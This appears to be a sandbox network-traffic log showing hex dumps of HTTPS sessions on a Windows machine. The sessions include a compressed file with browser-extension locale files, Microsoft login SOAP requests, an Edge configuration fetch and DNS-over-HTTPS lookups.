                                                                                                                                                                                                        2024-11-11 07:11:04 UTC1255INData Raw: 58 7b 86 83 51 c6 93 36 cc ca 00 06 b1 e5 ba cc c3 82 b6 13 a1 4a e7 b7 e5 ce d2 13 2d 21 ee 5b de b8 47 ed 05 79 d6 88 0d b5 a0 55 2c ea fd da 77 09 fb 8d 08 20 47 3e 4e 89 39 3e c5 0a 3e f1 d4 8d 51 57 47 95 f6 20 3a c7 5b ae f6 20 9d 95 11 41 a7 49 a0 6b 22 7f 4a 85 a5 16 e3 be ea ea 53 6c ac 7d a7 ea bc 52 0f e6 25 b5 4d a4 b2 0d 9e df 37 14 c0 cf 8c aa 5d 6e d8 54 98 28 d1 75 86 0b 05 0f 47 4f 24 4c 0d bd ec f1 97 5c de cf 7f ca a1 b3 4f d6 6a 0f 73 13 2d 3c 46 ac a2 a9 6a c2 20 82 d1 98 53 1c 4b a0 bd 88 e1 7c 94 16 4b a8 f1 7c a7 bb 68 2a 48 48 e9 2c 3e b2 74 b8 2f eb fe 70 49 01 4e d7 7a 9e b2 bb cc b2 1b 0f 88 4b 83 59 3a bf 5a e7 2d 33 b5 de ed 5c 4a 09 23 28 65 8f dc 9c b2 08 b8 31 63 6c 42 0f 30 1d 21 13 8b eb d0 af 3d 4b 23 f7 79 17 4f 24 1d
                                                                                                                                                                                                        Data Ascii: X{Q6J-![GyU,w G>N9>>QWG :[ AIk"JSl}R%M7]nT(uGO$L\Ojs-<Fj SK|K|h*HH,>t/pINzKY:Z-3\J#(e1clB0!=K#yO$
                                                                                                                                                                                                        2024-11-11 07:11:04 UTC1255INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 b5 56 cb 6e db 30 10 bc f7 2b 04 9d 85 80 22 a9 57 7e a0 3f d1 0b 6d 51 a9 01 59 12 6c 07 2d 10 e4 df 1b 71 97 e0 d0 94 5b 3b 45 2e 04 ac 25 67 67 77 87 63 be e5 fb 93 35 17 3b d9 5f f9 f3 5b 7e b4 e7 b3 79 b1 f9 73 fe e3 55 74 b2 75 eb b0 ae ca 66 ee c7 3e 04 94 5d 57 e1 c2 42 e6 ef 45 6e 7f 2f a3 99 cc e5 30 4f f3 30 8c 87 c9 f6 87 b3 d9 8d b6 4f c1 45 ed 90 8c 83 2d cb 75 ad 1c a0 92 00 de 50 3a b7 49 75 eb aa 5b ca f7 94 85 0d c2 1d 29 89 a8 08 0c 75 43 df 29 47 95 04 dc 17 dd bb 63 35 64 e2 40 03 25 ab 01 0b cf be cf f3 cb c8 2d 71 27 55 1b b0 a4 0e 15 a8 2a e4 ab 76 80 ce 0d 15 1d b5 21 74 5a ef dc a6 06 f7 46 35 a5 14 b9 65 34 89 a1 20 e0 8a 60 42 5c 0b ac 87 d8 89 47 bb a8 52 12 b7 5a ea 4f 74 a1 aa a8 04 2a fa
                                                                                                                                                                                                        Data Ascii: Vn0+"W~?mQYl-q[;E.%ggwc5;_[~ysUtuf>]WBEn/0O0OE-uP:Iu[)uC)Gc5d@%-q'U*v!tZF5e4 `B\GRZOt*
                                                                                                                                                                                                        2024-11-11 07:11:04 UTC1255INData Raw: b0 37 f2 10 db 4a 83 aa 5e 0c 32 bb 3b fb 98 59 73 49 d7 47 ad 4e ba d1 5f e9 f2 92 1e 74 df ab 9d 4e 97 e9 c7 79 91 33 79 3f 45 7e 3f b9 30 37 85 39 b3 c4 7c ac cd b9 35 46 ca 7e 4f af af a9 fe ee 6a d5 a8 d3 be 6d da ed b6 de 37 7a b3 ef d5 aa d6 9b 00 04 77 10 4c d9 b0 a5 b9 22 bc 04 60 0d 06 97 ee c6 1a 2d d6 09 7a 18 23 ee 1c 98 76 69 92 9b b4 0e 72 6c 4a 79 6c 11 33 79 6f db 5d ad e7 a7 06 1e 98 2d 36 95 dc b2 f1 0d 55 44 6e f0 83 60 18 5b ba a8 a2 4a c2 40 bc f2 4a 7a 2c cf 38 d8 0c 94 17 c3 56 64 7f 66 1b 73 fa 40 36 7f 96 3b 1e d8 9e 12 27 2a 98 ce fc 96 8b d2 b1 8f 1b 0f 99 61 0f 0a 2f 38 c3 41 03 44 f5 e4 08 a3 cd 21 bc 2c d2 16 01 89 90 48 64 c4 94 5a 41 10 6a 9c ce 28 11 73 16 58 c0 6c 92 bd 85 75 aa 9b 7f 90 29 f8 09 0a 9b 78 a1 88 47 38 cb
                                                                                                                                                                                                        Data Ascii: 7J^2;YsIGN_tNy3y?E~?079|5F~Ojm7zwL"`-z#virlJyl3yo]-6UDn`[J@Jz,8Vdfs@6;'*a/8AD!,HdZAj(sXlu)xG8
                                                                                                                                                                                                        2024-11-11 07:11:04 UTC1255INData Raw: 54 05 00 01 50 03 fc 66 0a 00 20 00 00 00 00 00 01 00 18 00 00 08 b1 f4 0b 14 db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cd 56 cb 6e dc 30 0c bc f7 2b 0c 9f 73 d0 cb b5 37 3f 90 9f e8 45 6b 6b d3 05 bc b6 b1 eb a0 01 82 fc 7b 63 0d 0b d2 95 ec 36 41 d1 f6 42 2c 28 69 38 24 87 f4 be 94 ed 35 f8 39 0c e1 5b 79 ff 52 5e c2 ed e6 1f 43 79 5f 7e 79 52 c1 f8 68 ed 62 dd 61 b1 d6 2c 56 d5 d1 13 fd e6 18 ad 8e 9e a6 7c bd 2b c3 f3 d4 fb c1 cf e7 71 18 4f a7 fe 3c 84 ee 7c f3 c7 3e 74 69 04 e5 22 6a b3 58 0d bc 8e ad 3e 45 d4 78 c7 54 d1 13 59 b8 56 dc 8c 8c 2c fc 4d c1 94 88 6a 24 a6 2b 4e 01 cf 90 02 4e 71 93 d2 8c 56 79 dc 2f 1e c6 f1 b1 0f 11 d5 29 f1 5a 73 79 56 af e3 6f ed 98 18 91 a7 f2 30 0e 22 d8 9a fd 94 8e e4 db fc 1c d1 e2 d4 b3 df 3a 51 96
                                                                                                                                                                                                        Data Ascii: TPf Vn0+s7?Ekk{c6AB,(i8$59[yR^Cy_~yRhba,V|+qO<|>ti"jX>ExTYV,Mj$+NNqVy/)ZsyVo0":Q
                                                                                                                                                                                                        2024-11-11 07:11:04 UTC1255INData Raw: 25 d3 2c 1e 59 ac 52 aa 91 be 9c 30 a7 f1 f7 05 55 ff 46 65 38 dd da ff 41 5d e3 55 52 e4 87 b3 a7 8d bc bb 80 09 65 52 ae bf cb e0 f3 cf 17 50 4b 07 08 88 5a e2 14 44 02 00 00 d6 0c 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 6b 6e 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 50 03 fc 66 0a 00 20 00 00 00 00 00 01 00 18 00 00 08 b1 f4 0b 14 db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d5 56 db 6e a3 30 10 7d df af 40 3c a3 8a a4 0d 98 fe 40 7f 62 5f 8c 19 77 23 11 40 49 aa ad 54 f5 df b7 78 06 f9 80 21 81 ae f6 61 5f 2c cb 78 6e 67 ce 1c f3 11 9b 33 e9 2b 35 f4 3b 7e fe 88 4f 74 b9 e8 57 8a 9f e3 9f 6f a9 29 8b 7e 35 da ed 55 bf ea cc ad 6e 6f 2a d8 ef 22
                                                                                                                                                                                                        Data Ascii: %,YR0UFe8A]UReRPKZDPK!-_locales/kn/messages.jsonUTPf Vn0}@<@b_w#@ITx!a_,xng3+5;~OtWo)~5Uno*"
                                                                                                                                                                                                        2024-11-11 07:11:04 UTC1255INData Raw: b1 df 7e 87 a0 ab 94 bc 8a a2 23 3b 33 ab 1d a9 96 6d b4 27 d4 36 64 0d 6b fa b7 aa b8 b2 43 0e 6d 4c 25 f6 61 b9 10 6f 59 97 62 17 fb dc 1e 24 0e 5c d0 6f 31 65 8b 7c a1 4c c0 c0 35 b5 e2 d8 f5 f5 9a d5 f9 42 3f 5a 45 78 e2 ec ca f3 9b bf 50 4b 07 08 c4 85 2c a4 c0 01 00 00 b3 03 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 7a 68 5f 54 57 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 50 03 fc 66 0a 00 20 00 00 00 00 00 01 00 18 00 00 08 b1 f4 0b 14 db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a5 53 cb 6e dc 30 0c bc f7 2b 02 9f 7b 90 f5 a0 a8 fc 40 7f c2 17 c9 a2 d2 05 bc b6 b1 bb 46 0b 04 f9 f7 92 56 9c d8 d9 2d 50 a0 17 82 20 28 ce 70 38 7a 6d fa 0b c5 1b
                                                                                                                                                                                                        Data Ascii: ~#;3m'6dkCmL%aoYb$\o1e|L5B?ZExPK,PK!-_locales/zh_TW/messages.jsonUTPf Sn0+{@FV-P (p8zm


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        3192.168.11.204978540.126.29.12443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-11-11 07:11:12 UTC420OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: application/soap+xml
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19042.0.0; IDCRL-cfg 16.000.29143.3; App svchost.exe, 10.0.19041.546, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                        Content-Length: 4742
                                                                                                                                                                                                        Host: login.live.com
                                                                                                                                                                                                        2024-11-11 07:11:12 UTC4742OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                        2024-11-11 07:11:12 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                        Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                        Expires: Mon, 11 Nov 2024 07:10:12 GMT
                                                                                                                                                                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                        x-ms-route-info: C523_BAY
                                                                                                                                                                                                        x-ms-request-id: 9c786621-f926-43d0-80e2-b83385b77239
                                                                                                                                                                                                        PPServer: PPV: 30 H: PH1PEPF0001B894 V: 0
                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 07:11:12 GMT
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 10197
                                                                                                                                                                                                        2024-11-11 07:11:12 UTC10197INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        4192.168.11.204978620.190.135.7443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-11-11 07:11:12 UTC420OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: application/soap+xml
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19042.0.0; IDCRL-cfg 16.000.29143.3; App svchost.exe, 10.0.19041.546, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                        Content-Length: 4742
                                                                                                                                                                                                        Host: login.live.com
                                                                                                                                                                                                        2024-11-11 07:11:12 UTC4742OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                        2024-11-11 07:11:12 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                        Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                        Expires: Mon, 11 Nov 2024 07:10:12 GMT
                                                                                                                                                                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                        x-ms-route-info: C523_SN1
                                                                                                                                                                                                        x-ms-request-id: afdcde83-861a-482a-a4ac-d44835c22762
                                                                                                                                                                                                        PPServer: PPV: 30 H: SN1PEPF0002F152 V: 0
                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 07:11:12 GMT
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 10197
                                                                                                                                                                                                        2024-11-11 07:11:12 UTC10197INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        5192.168.11.206350552.123.251.144436672C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-11-11 07:11:13 UTC610OUTGET /config/v1/Edge/94.0.992.31?clientId=6757335511995507682&osname=win&client=edge&channel=stable&scpfull=0&scpguard=0&scpfre=0&osver=10.0.19042&osarch=x86_64&osedition=professional&wu=1&devicefamily=desktop&uma=0&mngd=0&installdate=1630626147 HTTP/1.1
                                                                                                                                                                                                        Host: config.edge.skype.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        If-None-Match: "mOB9Fluqaq+mietxhYXSL2cAH0KxdzECs1csHpZVA18="
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                                                        2024-11-11 07:11:13 UTC1177INHTTP/1.1 200 OK
                                                                                                                                                                                                        Cache-Control: no-cache,max-age=3600
                                                                                                                                                                                                        Content-Length: 8891
                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                        Expires: Mon, 11 Nov 2024 08:11:13 GMT
                                                                                                                                                                                                        ETag: "i57ge/tW4g+sRME6adKCKTLZkHbagnUsuybi3oPAezs="
                                                                                                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                                                                                                        request-id: 1caa353b-3cbd-3d14-5a7a-267070def7c8
                                                                                                                                                                                                        X-BackEndHttpStatus: 200
                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                        Report-To: {"group":"NelEcsUpload1","max_age":604800,"endpoints":[{"url":"https://ecs.nel.measure.office.net?TenantId=Edge&DestinationEndpoint=MIRA-SIP-MN2&FrontEnd=MIRA"}],"include_subdomains":true}
                                                                                                                                                                                                        NEL: {"report_to":"NelEcsUpload1","max_age":604800,"include_subdomains":true,"failure_fraction":1.0,"success_fraction":0.01}
                                                                                                                                                                                                        X-Proxy-RoutingCorrectness: 1
                                                                                                                                                                                                        X-MSEdge-Ref: MIRA: 1caa353b-3cbd-3d14-5a7a-267070def7c8 MN2PR05CA0054 2024-11-11T07:11:13.236Z
                                                                                                                                                                                                        Alt-Svc: h3=":443";ma=2592000,h3-29=":443";ma=2592000
                                                                                                                                                                                                        X-Proxy-BackendServerStatus: 200
                                                                                                                                                                                                        X-FirstHopCafeEFZ: MNZ
                                                                                                                                                                                                        X-FEProxyInfo: MN2PR05CA0054.NAMPRD05.PROD.OUTLOOK.COM
                                                                                                                                                                                                        X-FEEFZInfo: MNZ
                                                                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                                                                        X-FEServer: MN2PR05CA0054
                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 07:11:12 GMT
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        2024-11-11 07:11:13 UTC1756INData Raw: 7b 22 45 43 53 22 3a 7b 22 45 78 63 6c 75 64 65 45 78 74 65 72 6e 61 6c 43 6f 6e 66 69 67 49 64 73 49 6e 4c 6f 67 22 3a 74 72 75 65 2c 22 43 6f 6e 66 69 67 4c 6f 67 54 61 72 67 65 74 22 3a 22 65 64 67 65 5f 73 74 61 62 6c 65 22 7d 2c 22 45 64 67 65 22 3a 7b 22 44 69 73 63 6f 6e 6e 65 63 74 65 64 45 72 72 6f 72 50 61 67 65 56 61 72 69 61 74 69 6f 6e 73 22 3a 7b 22 65 6e 61 62 6c 65 46 65 61 74 75 72 65 73 22 3a 5b 22 6d 73 53 68 6f 77 54 72 6f 75 62 6c 65 73 68 6f 6f 74 42 75 74 74 6f 6e 4f 6e 45 72 72 6f 72 50 61 67 65 22 2c 22 6d 73 44 69 73 63 6f 6e 6e 65 63 74 65 64 45 72 72 6f 72 50 61 67 65 56 61 72 69 61 74 69 6f 6e 32 22 5d 7d 2c 22 54 6f 61 73 74 65 72 22 3a 7b 22 65 6e 61 62 6c 65 46 65 61 74 75 72 65 73 22 3a 5b 22 6d 73 45 64 67 65 44 65 76 54
                                                                                                                                                                                                        Data Ascii: {"ECS":{"ExcludeExternalConfigIdsInLog":true,"ConfigLogTarget":"edge_stable"},"Edge":{"DisconnectedErrorPageVariations":{"enableFeatures":["msShowTroubleshootButtonOnErrorPage","msDisconnectedErrorPageVariation2"]},"Toaster":{"enableFeatures":["msEdgeDevT
                                                                                                                                                                                                        2024-11-11 07:11:13 UTC7135INData Raw: 65 72 4d 65 6e 75 44 69 73 61 62 6c 65 4e 6f 74 69 66 69 63 61 74 69 6f 6e 73 22 2c 22 6d 73 45 64 67 65 53 68 6f 70 70 69 6e 67 53 65 74 74 69 6e 67 73 49 6e 50 61 6e 65 22 2c 22 6d 73 45 64 67 65 53 68 6f 70 70 69 6e 67 53 65 74 74 69 6e 67 73 49 6e 50 61 6e 65 4e 6f 74 69 66 69 63 61 74 69 6f 6e 42 6f 74 74 6f 6d 54 6f 67 67 6c 65 22 2c 22 6d 73 51 75 65 72 79 53 68 6f 70 70 69 6e 67 4d 65 74 61 64 61 74 61 22 2c 22 6d 73 53 68 6f 77 52 65 73 75 6c 74 73 53 68 6f 70 70 69 6e 67 4d 65 74 61 64 61 74 61 22 2c 22 6d 73 45 64 67 65 53 68 6f 70 70 69 6e 67 52 65 66 72 65 73 68 22 2c 22 6d 73 45 64 67 65 53 68 6f 70 70 69 6e 67 53 65 74 74 69 6e 67 73 50 72 69 76 61 63 79 53 74 72 69 6e 67 22 5d 2c 22 64 69 73 61 62 6c 65 46 65 61 74 75 72 65 73 22 3a 5b 22
                                                                                                                                                                                                        Data Ascii: erMenuDisableNotifications","msEdgeShoppingSettingsInPane","msEdgeShoppingSettingsInPaneNotificationBottomToggle","msQueryShoppingMetadata","msShowResultsShoppingMetadata","msEdgeShoppingRefresh","msEdgeShoppingSettingsPrivacyString"],"disableFeatures":["


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        6192.168.11.2059315149.112.112.1124436672C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-11-11 07:11:17 UTC233OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                        Host: dns.quad9.net
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                        2024-11-11 07:11:17 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                        2024-11-11 07:11:17 UTC183INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 07:11:17 GMT
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 60
                                                                                                                                                                                                        Server: h2o/dnsdist
                                                                                                                                                                                                        content-type: application/dns-message
                                                                                                                                                                                                        cache-control: max-age=161
                                                                                                                                                                                                        2024-11-11 07:11:17 UTC60INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 a1 00 04 8e fa 69 5e 00 00 29 04 d0 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: wwwgstaticcomi^)


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        7192.168.11.2053091172.64.41.34436672C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-11-11 07:11:17 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                        2024-11-11 07:11:17 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                        2024-11-11 07:11:17 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 07:11:17 GMT
                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
